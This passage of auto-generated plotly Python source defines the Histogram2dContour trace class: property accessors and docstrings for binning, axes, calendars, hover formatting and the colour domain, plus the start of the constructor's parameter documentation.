point (the ones that are `arrayOk: true`) is available. Finally,
the template string has access to the variables `x`, `y`, `z`
and `text`.
The 'texttemplate' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
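
Example (an illustrative sketch; `contours.coloring` is set to
"heatmap" because this attribute only takes effect in that mode,
and the template text is made up):

    import plotly.graph_objects as go

    trace = go.Histogram2dContour(
        x=[1, 1, 2, 2, 3],
        y=[4, 5, 5, 6, 6],
        contours=dict(coloring="heatmap"),
        texttemplate="%{z}",
    )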
"""
return self["texttemplate"]
@texttemplate.setter
def texttemplate(self, val):
self["texttemplate"] = val
# uid
# ---
@property
def uid(self):
"""
Assign an id to this trace. Use this to provide object
constancy between traces during animations and transitions.
The 'uid' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["uid"]
@uid.setter
def uid(self, val):
self["uid"] = val
# uirevision
# ----------
@property
def uirevision(self):
"""
Controls persistence of some user-driven changes to the trace:
`constraintrange` in `parcoords` traces, as well as some
`editable: true` modifications such as `name` and
`colorbar.title`. Defaults to `layout.uirevision`. Note that
other user-driven trace attribute changes are controlled by
`layout` attributes: `trace.visible` is controlled by
`layout.legend.uirevision`, `selectedpoints` is controlled by
`layout.selectionrevision`, and `colorbar.(x|y)` (accessible
with `config: {editable: true}`) is controlled by
`layout.editrevision`. Trace changes are tracked by `uid`,
which only falls back on trace index if no `uid` is provided.
So if your app can add/remove traces before the end of the
`data` array, such that the same trace has a different index,
you can still preserve user-driven changes if you give each
trace a `uid` that stays with it as it moves.
The 'uirevision' property accepts values of any type
Returns
-------
Any
"""
return self["uirevision"]
@uirevision.setter
def uirevision(self, val):
self["uirevision"] = val
# visible
# -------
@property
def visible(self):
"""
Determines whether or not this trace is visible. If
"legendonly", the trace is not drawn, but can appear as a
legend item (provided that the legend itself is visible).
The 'visible' property is an enumeration that may be specified as:
- One of the following enumeration values:
[True, False, 'legendonly']
Returns
-------
Any
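
Example (an illustrative sketch; the trace starts hidden but is
still listed in the legend, and the data values are made up):

    import plotly.graph_objects as go

    trace = go.Histogram2dContour(
        x=[1, 2, 3],
        y=[4, 5, 6],
        visible="legendonly",
    )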
"""
return self["visible"]
@visible.setter
def visible(self, val):
self["visible"] = val
# x
# -
@property
def x(self):
"""
Sets the sample data to be binned on the x axis.
The 'x' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["x"]
@x.setter
def x(self, val):
self["x"] = val
# xaxis
# -----
@property
def xaxis(self):
"""
Sets a reference between this trace's x coordinates and a 2D
cartesian x axis. If "x" (the default value), the x coordinates
refer to `layout.xaxis`. If "x2", the x coordinates refer to
`layout.xaxis2`, and so on.
The 'xaxis' property is an identifier of a particular
subplot, of type 'x', that may be specified as the string 'x'
optionally followed by an integer >= 1
(e.g. 'x', 'x1', 'x2', 'x3', etc.)
Returns
-------
str
"""
return self["xaxis"]
@xaxis.setter
def xaxis(self, val):
self["xaxis"] = val
# xbingroup
# ---------
@property
def xbingroup(self):
"""
Set a group of histogram traces which will have compatible
x-bin settings. Using `xbingroup`, histogram2d and
histogram2dcontour traces (on axes of the same axis type) can
have compatible x-bin settings. Note that the same `xbingroup`
value can be used to set (1D) histogram `bingroup`
The 'xbingroup' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
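
Example (an illustrative sketch; the group name "xgroup1" is an
arbitrary label, and the two traces are assumed to share the
same x axis type):

    import plotly.graph_objects as go

    fig = go.Figure(
        data=[
            go.Histogram2dContour(x=[1, 2, 2], y=[3, 3, 4], xbingroup="xgroup1"),
            go.Histogram2dContour(x=[1, 1, 3], y=[4, 5, 5], xbingroup="xgroup1"),
        ]
    )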
"""
return self["xbingroup"]
@xbingroup.setter
def xbingroup(self, val):
self["xbingroup"] = val
# xbins
# -----
@property
def xbins(self):
"""
The 'xbins' property is an instance of XBins
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.XBins`
- A dict of string/value properties that will be passed
to the XBins constructor
Supported dict properties:
end
Sets the end value for the x axis bins. The
last bin may not end exactly at this value, we
increment the bin edge by `size` from `start`
until we reach or exceed `end`. Defaults to the
maximum data value. Like `start`, for dates use
a date string, and for category data `end` is
based on the category serial numbers.
size
Sets the size of each x axis bin. Default
behavior: If `nbinsx` is 0 or omitted, we
choose a nice round bin size such that the
number of bins is about the same as the typical
number of samples in each bin. If `nbinsx` is
provided, we choose a nice round bin size
giving no more than that many bins. For date
data, use milliseconds or "M<n>" for months, as
in `axis.dtick`. For category data, the number
of categories to bin together (always defaults
to 1).
start
Sets the starting value for the x axis bins.
Defaults to the minimum data value, shifted
down if necessary to make nice round values and
to remove ambiguous bin edges. For example, if
most of the data is integers we shift the bin
edges 0.5 down, so a `size` of 5 would have a
default `start` of -0.5, so it is clear that
0-4 are in the first bin, 5-9 in the second,
but continuous data gets a start of 0 and bins
[0,5), [5,10) etc. Dates behave similarly, and
`start` should be a date string. For category
data, `start` is based on the category serial
numbers, and defaults to -0.5.
Returns
-------
plotly.graph_objs.histogram2dcontour.XBins
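
Example (an illustrative sketch; the start/end/size values are
arbitrary and only show the dict form accepted here):

    import plotly.graph_objects as go

    trace = go.Histogram2dContour(
        x=[0.2, 1.4, 2.1, 3.8, 4.9],
        y=[1.0, 1.5, 2.0, 2.5, 3.0],
        xbins=dict(start=0, end=5, size=0.5),
    )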
"""
return self["xbins"]
@xbins.setter
def xbins(self, val):
self["xbins"] = val
# xcalendar
# ---------
@property
def xcalendar(self):
"""
Sets the calendar system to use with `x` date data.
The 'xcalendar' property is an enumeration that may be specified as:
- One of the following enumeration values:
['chinese', 'coptic', 'discworld', 'ethiopian',
'gregorian', 'hebrew', 'islamic', 'jalali', 'julian',
'mayan', 'nanakshahi', 'nepali', 'persian', 'taiwan',
'thai', 'ummalqura']
Returns
-------
Any
"""
return self["xcalendar"]
@xcalendar.setter
def xcalendar(self, val):
self["xcalendar"] = val
# xhoverformat
# ------------
@property
def xhoverformat(self):
"""
Sets the hover text formatting rule for `x` using d3 formatting
mini-languages which are very similar to those in Python. For
numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format. And for
dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to d3's date
formatter: "%h" for half of the year as a decimal number as
well as "%{n}f" for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with tickformat
"%H~%M~%S.%2f" would display *09~15~23.46*By default the values
are formatted using `xaxis.hoverformat`.
The 'xhoverformat' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
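
Example (an illustrative sketch; the x values are assumed to be
date strings, and the format string is just one possibility):

    import plotly.graph_objects as go

    trace = go.Histogram2dContour(
        x=["2021-01-01", "2021-01-02", "2021-01-02"],
        y=[1, 2, 2],
        xhoverformat="%d %b %Y",
    )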
"""
return self["xhoverformat"]
@xhoverformat.setter
def xhoverformat(self, val):
self["xhoverformat"] = val
# xsrc
# ----
@property
def xsrc(self):
"""
Sets the source reference on Chart Studio Cloud for `x`.
The 'xsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["xsrc"]
@xsrc.setter
def xsrc(self, val):
self["xsrc"] = val
# y
# -
@property
def y(self):
"""
Sets the sample data to be binned on the y axis.
The 'y' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["y"]
@y.setter
def y(self, val):
self["y"] = val
# yaxis
# -----
@property
def yaxis(self):
"""
Sets a reference between this trace's y coordinates and a 2D
cartesian y axis. If "y" (the default value), the y coordinates
refer to `layout.yaxis`. If "y2", the y coordinates refer to
`layout.yaxis2`, and so on.
The 'yaxis' property is an identifier of a particular
subplot, of type 'y', that may be specified as the string 'y'
optionally followed by an integer >= 1
(e.g. 'y', 'y1', 'y2', 'y3', etc.)
Returns
-------
str
"""
return self["yaxis"]
@yaxis.setter
def yaxis(self, val):
self["yaxis"] = val
# ybingroup
# ---------
@property
def ybingroup(self):
"""
Set a group of histogram traces which will have compatible
y-bin settings. Using `ybingroup`, histogram2d and
histogram2dcontour traces (on axes of the same axis type) can
have compatible y-bin settings. Note that the same `ybingroup`
value can be used to set (1D) histogram `bingroup`
The 'ybingroup' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["ybingroup"]
@ybingroup.setter
def ybingroup(self, val):
self["ybingroup"] = val
# ybins
# -----
@property
def ybins(self):
"""
The 'ybins' property is an instance of YBins
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.YBins`
- A dict of string/value properties that will be passed
to the YBins constructor
Supported dict properties:
end
Sets the end value for the y axis bins. The
last bin may not end exactly at this value, we
increment the bin edge by `size` from `start`
until we reach or exceed `end`. Defaults to the
maximum data value. Like `start`, for dates use
a date string, and for category data `end` is
based on the category serial numbers.
size
Sets the size of each y axis bin. Default
behavior: If `nbinsy` is 0 or omitted, we
choose a nice round bin size such that the
number of bins is about the same as the typical
number of samples in each bin. If `nbinsy` is
provided, we choose a nice round bin size
giving no more than that many bins. For date
data, use milliseconds or "M<n>" for months, as
in `axis.dtick`. For category data, the number
of categories to bin together (always defaults
to 1).
start
Sets the starting value for the y axis bins.
Defaults to the minimum data value, shifted
down if necessary to make nice round values and
to remove ambiguous bin edges. For example, if
most of the data is integers we shift the bin
edges 0.5 down, so a `size` of 5 would have a
default `start` of -0.5, so it is clear that
0-4 are in the first bin, 5-9 in the second,
but continuous data gets a start of 0 and bins
[0,5), [5,10) etc. Dates behave similarly, and
`start` should be a date string. For category
data, `start` is based on the category serial
numbers, and defaults to -0.5.
Returns
-------
plotly.graph_objs.histogram2dcontour.YBins
"""
return self["ybins"]
@ybins.setter
def ybins(self, val):
self["ybins"] = val
# ycalendar
# ---------
@property
def ycalendar(self):
"""
Sets the calendar system to use with `y` date data.
The 'ycalendar' property is an enumeration that may be specified as:
- One of the following enumeration values:
['chinese', 'coptic', 'discworld', 'ethiopian',
'gregorian', 'hebrew', 'islamic', 'jalali', 'julian',
'mayan', 'nanakshahi', 'nepali', 'persian', 'taiwan',
'thai', 'ummalqura']
Returns
-------
Any
"""
return self["ycalendar"]
@ycalendar.setter
def ycalendar(self, val):
self["ycalendar"] = val
# yhoverformat
# ------------
@property
def yhoverformat(self):
"""
Sets the hover text formatting rule for `y` using d3 formatting
mini-languages which are very similar to those in Python. For
numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format. And for
dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to d3's date
formatter: "%h" for half of the year as a decimal number as
well as "%{n}f" for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with tickformat
"%H~%M~%S.%2f" would display *09~15~23.46*By default the values
are formatted using `yaxis.hoverformat`.
The 'yhoverformat' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["yhoverformat"]
@yhoverformat.setter
def yhoverformat(self, val):
self["yhoverformat"] = val
# ysrc
# ----
@property
def ysrc(self):
"""
Sets the source reference on Chart Studio Cloud for `y`.
The 'ysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["ysrc"]
@ysrc.setter
def ysrc(self, val):
self["ysrc"] = val
# z
# -
@property
def z(self):
"""
Sets the aggregation data.
The 'z' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["z"]
@z.setter
def z(self, val):
self["z"] = val
# zauto
# -----
@property
def zauto(self):
"""
Determines whether or not the color domain is computed with
respect to the input data (here in `z`) or the bounds set in
`zmin` and `zmax` Defaults to `false` when `zmin` and `zmax`
are set by the user.
The 'zauto' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["zauto"]
@zauto.setter
def zauto(self, val):
self["zauto"] = val
# zhoverformat
# ------------
@property
def zhoverformat(self):
"""
Sets the hover text formatting rule for `z` using d3 formatting
mini-languages which are very similar to those in Python. For
numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format. By
default the values are formatted using generic number format.
The 'zhoverformat' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["zhoverformat"]
@zhoverformat.setter
def zhoverformat(self, val):
self["zhoverformat"] = val
# zmax
# ----
@property
def zmax(self):
"""
Sets the upper bound of the color domain. Value should have the
same units as in `z` and if set, `zmin` must be set as well.
The 'zmax' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
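
Example (an illustrative sketch; the bounds are arbitrary and,
as noted above, `zmin` is set together with `zmax`):

    import plotly.graph_objects as go

    trace = go.Histogram2dContour(
        x=[1, 1, 2, 2, 3],
        y=[4, 5, 5, 6, 6],
        zmin=0,
        zmax=10,
    )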
"""
return self["zmax"]
@zmax.setter
def zmax(self, val):
self["zmax"] = val
# zmid
# ----
@property
def zmid(self):
"""
Sets the mid-point of the color domain by scaling `zmin` and/or
`zmax` to be equidistant to this point. Value should have the
same units as in `z`. Has no effect when `zauto` is `false`.
The 'zmid' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["zmid"]
@zmid.setter
def zmid(self, val):
self["zmid"] = val
# zmin
# ----
@property
def zmin(self):
"""
Sets the lower bound of the color domain. Value should have the
same units as in `z` and if set, `zmax` must be set as well.
The 'zmin' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["zmin"]
@zmin.setter
def zmin(self, val):
self["zmin"] = val
# zsrc
# ----
@property
def zsrc(self):
"""
Sets the source reference on Chart Studio Cloud for `z`.
The 'zsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["zsrc"]
@zsrc.setter
def zsrc(self, val):
self["zsrc"] = val
# type
# ----
@property
def type(self):
return self._props["type"]
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
autobinx
Obsolete: since v1.42 each bin attribute is auto-
determined separately and `autobinx` is not needed.
However, we accept `autobinx: true` or `false` and will
update `xbins` accordingly before deleting `autobinx`
from the trace.
autobiny
Obsolete: since v1.42 each bin attribute is auto-
determined separately and `autobiny` is not needed.
However, we accept `autobiny: true` or `false` and will
update `ybins` accordingly before deleting `autobiny`
from the trace.
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`colorscale`. In case `colorscale` is unspecified or
`autocolorscale` is true, the default palette will be
chosen according to whether numbers in the `color`
array are all positive, all negative or mixed.
autocontour
Determines whether or not the contour level attributes
are picked by an algorithm. If True, the number of
contour levels can be set in `ncontours`. If False, set
the contour level attributes in `contours`.
bingroup
Set the `xbingroup` and `ybingroup` default prefix. For
example, setting a `bingroup` of 1 on two histogram2d
traces will make their x-bins and y-bins match
separately.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
:class:`plotly.graph_objects.histogram2dcontour.ColorBa
r` instance or dict with compatible properties
colorscale
Sets the colorscale. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use `zmin` and `zmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Blackbody,Bluered,Blues,C
ividis,Earth,Electric,Greens,Greys,Hot,Jet,Picnic,Portl
and,Rainbow,RdBu,Reds,Viridis,YlGnBu,YlOrRd.
contours
:class:`plotly.graph_objects.histogram2dcontour.Contour
s` instance or dict with compatible properties
customdata
Assigns extra data to each datum. This may be useful when
listening to hover, click and selection events. Note
that "scatter" traces also append customdata items in
the markers DOM elements.
customdatasrc
Sets the source reference on Chart Studio Cloud for
`customdata`.
histfunc
Specifies the binning function used for this histogram
trace. If "count", the histogram values are computed by
counting the number of values lying inside each bin. If
"sum", "avg", "min", "max", the histogram values are
computed using the sum, the average, the minimum or the
maximum of the values lying inside each bin
respectively.
histnorm
Specifies the type of normalization used for this
histogram trace. If "", the span of each bar
corresponds to the number of occurrences (i.e. the
number of data points lying inside the bins). If
"percent" / "probability", the span of each bar
corresponds to the percentage / fraction of occurrences
with respect to the total number of sample points
(here, the sum of all bin HEIGHTS equals 100% / 1). If
"density", the span of each bar corresponds to the
number of occurrences in a bin divided by the size of
the bin interval (here, the sum of all bin AREAS equals
the total number of sample points). If *probability
density*, the area of each bar corresponds to the
probability that an event will fall into the
corresponding bin (here, the sum of all bin AREAS
equals 1).
hoverinfo
Determines which trace information appear on hover. If
`none` or `skip` are set, no information is displayed
upon hovering. But, if `none` is set, click and hover
events are still fired.
hoverinfosrc
Sets the source reference on Chart Studio Cloud for
`hoverinfo`.
hoverlabel
:class:`plotly.graph_objects.histogram2dcontour.Hoverla
bel` instance or dict with compatible properties
hovertemplate
Template string used for rendering the information that
appears in the hover box. Note that this will override
`hoverinfo`. Variables are inserted using %{variable},
for example "y: %{y}" as well as %{xother}, {%_xother},
{%_xother_}, {%xother_}. When showing info for several
points, "xother" will be added to those with different
x positions from the first point. An underscore before
or after "(x|y)other" will add a space on that side,
only when this field is shown. Numbers are formatted
using d3-format's syntax %{variable:d3-format}, for
example "Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format
for details on the formatting syntax. Dates are
formatted using d3-time-format's syntax
%{variable|d3-time-format}, for example "Day:
%{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the
date formatting syntax. The variables available in
`hovertemplate` are the ones emitted as event data
described at this link
https://plotly.com/javascript/plotlyjs-events/#event-
data. Additionally, every attribute that can be
specified per-point (the ones that are `arrayOk: true`)
is available. Finally, the template string has access to
the variable `z`. Anything contained in the tag
`<extra>` is displayed in the secondary box, for
example "<extra>{fullData.name}</extra>". To hide the
secondary box completely, use an empty tag
`<extra></extra>`.
hovertemplatesrc
Sets the source reference on Chart Studio Cloud for
`hovertemplate`.
ids
Assigns id labels to each datum. These ids are used for
object constancy of data points during animation. Should
be an array of strings, not numbers or any other type.
idssrc
Sets the source reference on Chart Studio Cloud for
`ids`.
legendgroup
Sets the legend group for this trace. Traces part of
the same legend group hide/show at the same time when
toggling legend items.
legendgrouptitle
:class:`plotly.graph_objects.histogram2dcontour.Legendg
rouptitle` instance or dict with compatible properties
legendrank
Sets the legend rank for this trace. Items and groups
with smaller ranks are presented on top/left side while
with *reversed* `legend.traceorder` they are on
bottom/right side. The default legendrank is 1000, so
that you can use ranks less than 1000 to place certain
items before all unranked items, and ranks greater than
1000 to go after all unranked items.
line
:class:`plotly.graph_objects.histogram2dcontour.Line`
instance or dict with compatible properties
marker
:class:`plotly.graph_objects.histogram2dcontour.Marker`
instance or dict with compatible properties
meta
Assigns extra meta information associated with this
trace that can be used in various text attributes.
Attributes such as trace `name`, graph, axis and
colorbar `title.text`, annotation `text`,
`rangeselector`, `updatemenus` and `sliders` `label`
text all support `meta`. To access the trace `meta`
values in an attribute in the same trace, simply use
`%{meta[i]}` where `i` is the index or key of the
`meta` item in question. To access trace `meta` in
layout attributes, use `%{data[n].meta[i]}` where `i`
is the index or key of the `meta` and `n` is the trace
index.
metasrc
Sets the source reference on Chart Studio Cloud for
`meta`.
name
Sets the trace name. The trace name appears as the
legend item and on hover.
nbinsx
Specifies the maximum number of desired bins. This
value will be used in an algorithm that will decide the
optimal bin size such that the histogram best
visualizes the distribution of the data. Ignored if
`xbins.size` is provided.
nbinsy
Specifies the maximum number of desired bins. This
value will be used in an algorithm that will decide the
optimal bin size such that the histogram best
visualizes the distribution of the data. Ignored if
`ybins.size` is provided.
ncontours
Sets the maximum number of contour levels. The actual
number of contours will be chosen automatically to be
less than or equal to the value of `ncontours`. Has an
effect only if `autocontour` is True or if
`contours.size` is missing.
opacity
Sets the opacity of the trace.
reversescale
Reverses the color mapping if true. If true, `zmin`
will correspond to the last color in the array and
`zmax` will correspond to the first color.
showlegend
Determines whether or not an item corresponding to this
trace is shown in the legend.
showscale
Determines whether or not a colorbar is displayed for
this trace.
stream
:class:`plotly.graph_objects.histogram2dcontour.Stream`
instance or dict with compatible properties
textfont
For this trace it only has an effect if `coloring` is
set to "heatmap". Sets the text font.
texttemplate
For this trace it only has an effect if `coloring` is
set to "heatmap". Template string used for rendering
the information text that appears on points. Note that
this will override `textinfo`. Variables are inserted
using %{variable}, for example "y: %{y}". Numbers are
formatted using d3-format's syntax
%{variable:d3-format}, for example "Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format
for details on the formatting syntax. Dates are
formatted using d3-time-format's syntax
%{variable|d3-time-format}, for example "Day:
%{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the
date formatting syntax. Every attribute that can be
specified per-point (the ones that are `arrayOk: true`)
is available. Finally, the template string has access to
the variables `x`, `y`, `z` and `text`.
uid
Assign an id to this trace. Use this to provide object
constancy between traces during animations and
transitions.
uirevision
Controls persistence of some user-driven changes to the
trace: `constraintrange` in `parcoords` traces, as well
as some `editable: true` modifications such as `name`
and `colorbar.title`. Defaults to `layout.uirevision`.
Note that other user-driven trace attribute changes are
controlled by `layout` attributes: `trace.visible` is
controlled by `layout.legend.uirevision`,
`selectedpoints` is controlled by
`layout.selectionrevision`, and `colorbar.(x|y)`
(accessible with `config: {editable: true}`) is
controlled by `layout.editrevision`. Trace changes are
tracked by `uid`, which only falls back on trace index
if no `uid` is provided. So if your app can add/remove
traces before the end of the `data` array, such that
the same trace has a different index, you can still
preserve user-driven changes if you give each trace a
`uid` that stays with it as it moves.
visible
Determines whether or not this trace is visible. If
"legendonly", the trace is not drawn, but can appear as
a legend item (provided that the legend itself is
visible).
x
Sets the sample data to be binned on the x axis.
xaxis
Sets a reference between this trace's x coordinates and
a 2D cartesian x axis. If "x" (the default value), the
x coordinates refer to `layout.xaxis`. If "x2", the x
coordinates refer to `layout.xaxis2`, and so on.
xbingroup
Set a group of histogram traces which will have
compatible x-bin settings. Using `xbingroup`,
histogram2d and histogram2dcontour traces (on axes of
the same axis type) can have compatible x-bin settings.
Note that the same `xbingroup` value can be used to set
(1D) histogram `bingroup`
xbins
:class:`plotly.graph_objects.histogram2dcontour.XBins`
instance or dict with compatible properties
xcalendar
Sets the calendar system to use with `x` date data.
xhoverformat
Sets the hover text formatting rule for `x` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.
And for dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to
d3's date formatter: "%h" for half of the year as a
decimal number as well as "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display *09~15~23.46*. By default the values are
formatted using `xaxis.hoverformat`.
xsrc
Sets the source reference on Chart Studio Cloud for
`x`.
y
Sets the sample data to be binned on the y axis.
yaxis
Sets a reference between this trace's y coordinates and
a 2D cartesian y axis. If "y" (the default value), the
y coordinates refer to `layout.yaxis`. If "y2", the y
coordinates refer to `layout.yaxis2`, and so on.
ybingroup
Set a group of histogram traces which will have
compatible y-bin settings. Using `ybingroup`,
histogram2d and histogram2dcontour traces (on axes of
the same axis type) can have compatible y-bin settings.
Note that the same `ybingroup` value can be used to set
(1D) histogram `bingroup`
ybins
:class:`plotly.graph_objects.histogram2dcontour.YBins`
instance or dict with compatible properties
ycalendar
Sets the calendar system to use with `y` date data.
yhoverformat
Sets the hover text formatting rule for `y` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.
And for dates see: https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two items to
d3's date formatter: "%h" for half of the year as a
decimal number as well as "%{n}f" for fractional
seconds with n digits. For example, *2016-10-13
09:15:23.456* with tickformat "%H~%M~%S.%2f" would
display *09~15~23.46*. By default the values are
formatted using `yaxis.hoverformat`.
ysrc
Sets the source reference on Chart Studio Cloud for
`y`.
z
Sets the aggregation data.
zauto
Determines whether or not the color domain is computed
with respect to the input data (here in `z`) or the
bounds set in `zmin` and `zmax` Defaults to `false`
when `zmin` and `zmax` are set by the user.
zhoverformat
Sets the hover text formatting rule for `z` using d3
formatting mini-languages which are very similar to
those in Python. For numbers, see:
https://github.com/d3/d3-format/tree/v1.4.5#d3-format.
By default the values are formatted using generic
number format.
zmax
Sets the upper bound of the color domain. Value should
have the same units as in `z` and if set, `zmin` must
be set as well.
zmid
Sets the mid-point of the color domain by scaling
`zmin` and/or `zmax` to be equidistant to this point.
Value should have the same units as in `z`. Has no
effect when `zauto` is `false`.
zmin
Sets the lower bound of the color domain. Value should
have the same units as in `z` and if set, `zmax` must
be set as well.
zsrc
Sets the source reference on Chart Studio Cloud for
`z`.
"""
def __init__(
self,
arg=None,
autobinx=None,
autobiny=None,
autocolorscale=None,
autocontour=None,
bingroup=None,
coloraxis=None,
colorbar=None,
colorscale=None,
contours=None,
customdata=None,
customdatasrc=None,
histfunc=None,
histnorm=None,
hoverinfo=None,
hoverinfosrc=None,
hoverlabel=None,
hovertemplate=None,
hovertemplatesrc=None,
ids=None,
idssrc=None,
legendgroup=None,
legendgrouptitle=None,
legendrank=None,
line=None,
marker=None,
meta=None,
metasrc=None,
name=None,
nbinsx=None,
nbinsy=None,
ncontours=None,
opacity=None,
reversescale=None,
showlegend=None,
showscale=None,
stream=None,
textfont=None,
texttemplate=None,
uid=None,
uirevision=None,
visible=None,
x=None,
xaxis=None,
xbingroup=None,
xbins=None,
xcalendar=None,
xhoverformat=None,
xsrc=None,
y=None,
yaxis=None,
ybingroup=None,
ybins=None,
ycalendar=None,
yhoverformat=None,
ysrc=None,
z=None,
zauto=None,
zhoverformat=None,
zmax=None,
zmid=None,
zmin=None,
zsrc=None,
**kwargs,
):
"""
Construct a new Histogram2dContour object
The sample data from which statistics are computed is set in
`x` and `y` (where `x` and `y` represent marginal
distributions, binning is set in `xbins` and `ybins` in this
case) or `z` (where `z` represents the 2D distribution and
binning is set by `x` and `y` in this case). The
resulting distribution is visualized as a contour plot.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.Histogram2dContour`
autobinx
Obsolete: since v1.42 each bin attribute is auto-
determined separately and `autobinx` is not needed.
However, we accept `autobinx: true` or `false` and will
update `xbins` accordingly before deleting `autobinx`
from the trace.
autobiny
Obsolete: since v1.42 each bin attribute is auto-
determined separately and `autobiny` is not needed.
However, we accept `autobiny: true` or `false` and will
update `ybins` accordingly before deleting `autobiny`
from the trace.
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`colorscale`. In case `colorscale` is unspecified or
`autocolorscale` is true, the default palette will be
chosen according to whether numbers in the `color`
array are all positive, all negative or mixed.
autocontour
Determines whether or not the contour level attributes
are picked by an algorithm. If True, the number of
contour levels can be set in `ncontours`. If False, set
the contour level attributes in `contours`.
bingroup
Set the `xbingroup` and `ybingroup` default prefix. For
example, setting a `bingroup` of 1 on two histogram2d
traces will make their x-bins and y-bins match
separately.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
:class:`plotly.graph_objects.histogram2dcontour.ColorBa
r` instance or dict with compatible properties
colorscale
Sets the colorscale. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use `zmin` and `zmax`.
Alternatively, `colorscale` may be a palette name
string of the following list: Blackbody,Bluered,Blues,C
ividis,Earth,Electric,Greens,Greys,Hot,Jet,Picnic,Portl
and,Rainbow,RdBu,Reds,Viridis,YlGnBu,YlOrRd.
contours
:class:`plotly.graph_objects.histogram2dcontour.Contour
s` instance or dict with compatible properties
customdata
Assigns extra data to each datum. This may be useful when
listening to hover, click and selection events. Note
that "scatter" traces also append customdata items in
the markers DOM elements.
customdatasrc
Sets the source reference on Chart Studio Cloud for
`customdata`.
histfunc
Specifies the binning function used for this histogram
trace. If "count", the histogram values are computed by
counting the number of values lying inside each bin. If
"sum", "avg", "min", "max", the histogram values are
computed using the sum, the average, the minimum or the
maximum of the values lying inside each bin
respectively.
histnorm
Specifies the type of normalization used for this
histogram trace. If "", the span of each bar
corresponds to the number of occurrences (i.e. the
number of data points lying inside the bins). If
"percent" / "probability", the span of each bar
corresponds to the percentage / fraction of occurrences
with respect to the total number of sample points
(here, the sum of all bin HEIGHTS equals 100% / 1). If
"density", the span of each bar corresponds to the
number of occurrences in a bin divided by the size of
the bin interval (here, the sum of all bin AREAS equals
the total number of sample points). If *probability
density*, the area of each bar corresponds to the
probability that an event will fall into the
corresponding bin (here, the sum of all bin AREAS
equals 1).
hoverinfo
Determines which trace information appear on hover. If
`none` or `skip` are set, no information is displayed
upon hovering. But, if `none` is set, click and hover
events are still fired.
hoverinfosrc
Sets the source reference on Chart Studio Cloud for
`hoverinfo`.
hoverlabel
:class:`plotly.graph_objects.histogram2dcontour.Hoverla
bel` instance or dict with compatible properties
hovertemplate
Template string used for rendering the information that
appears in the hover box. Note that this will override
`hoverinfo`. Variables are inserted using %{variable},
for example "y: %{y}" as well as %{xother}, {%_xother},
{%_xother_}, {%xother_}. When showing info for several
points, "xother" will be added to those with different
x positions from the first point. An underscore before
or after "(x|y)other" will add a space on that side,
only when this field is shown. Numbers are formatted
